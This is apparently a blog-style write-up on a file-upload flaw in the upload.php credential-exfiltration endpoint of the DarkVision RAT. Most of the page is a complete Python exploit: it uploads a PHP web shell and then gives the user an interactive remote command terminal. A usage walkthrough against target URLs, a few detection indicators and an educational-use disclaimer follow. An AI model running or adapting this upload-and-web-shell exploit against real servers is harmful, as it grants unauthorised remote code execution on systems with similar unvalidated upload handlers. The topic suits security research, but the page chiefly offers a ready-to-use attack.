DarkVision.cpp
-
X

DarkVision RAT Analysis

In this technical analysis, we'll explore the DarkVision RAT malware, focusing on its password recovery module vulnerability and demonstrating a practical exploitation technique.

Understanding DarkVision RAT

DarkVision RAT is a sophisticated Remote Access Trojan developed in C/C++ and assembly language. A key component of this malware is its automatic password recovery module, which utilizes a simple upload.php script for exfiltrating stolen credentials.

Core Components

  • Password Recovery Module
  • File Upload Mechanism
  • Command & Control Infrastructure

Vulnerability Analysis

The vulnerability lies in the password recovery module's upload mechanism. The upload.php script accepts files without proper validation, allowing attackers to upload and execute malicious PHP code.

Key Parameters

  • hwid: Hardware ID parameter
  • logfoldername: Directory for uploaded files
  • uploaded_file: The file being uploaded

Exploitation Tool

I've developed a Python script that exploits this vulnerability to gain remote code execution. The script uploads a PHP web shell and provides an interactive terminal interface.

Exploitation Script

import requests
import random
import string
import os

def generate_random_string(length=8):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def upload_shell(url, hwid, logfoldername, shell_content):
    shell_file_name = "shell.php"
    with open(shell_file_name, "w") as f:
        f.write(shell_content)

    data = {
        "hwid": hwid,
        "logfoldername": logfoldername,
    }
    files = {
        "uploaded_file": (shell_file_name, open(shell_file_name, "rb"), "application/x-php"),
    }

    response = requests.post(url, data=data, files=files)
    return response

Interactive Terminal Implementation

def fancy_terminal(shell_url):
    os.system("clear")
    print("╔═════════════════════════════════════════════════════════════╗")
    print("║               DarkVision RAT Vuln - Terminal                ║")
    print("╚═════════════════════════════════════════════════════════════╝")
    
    while True:
        try:
            cmd = input("darkvision-vuln@remote $ ").strip()
            if cmd.lower() in ["exit", "quit"]:
                break

            response = requests.get(shell_url, params={"cmd": cmd})
            if response.status_code == 200:
                output = response.text.strip()
                if output:
                    print(output)
                else:
                    print("[!] Command executed successfully, but no output was returned.")
        except KeyboardInterrupt:
            print("\nSession interrupted. Goodbye!")
            break

Detection

Indicators

  • upload.php scripts on unknown servers.
  • HTTP POST requests containing fields like hwid and logfoldername.
  • upload.php string

Usage Guide

Running the Exploit

# Start the exploit
python darkvision_vuln.py

# Enter target URL
[?] Enter the URL of upload.php: http://target.com/upload.php

# Use the generated shell URL
[+] Shell URL: http://target.com/uploads/[random_hwid]/[random_folder]/shell.php

Note: This analysis is for educational and research purposes only. Always obtain proper authorization before testing security tools.

Additional Resources

  • Detailed Technical Analysis: Zscaler Research
  • Source Code: Available in the research repository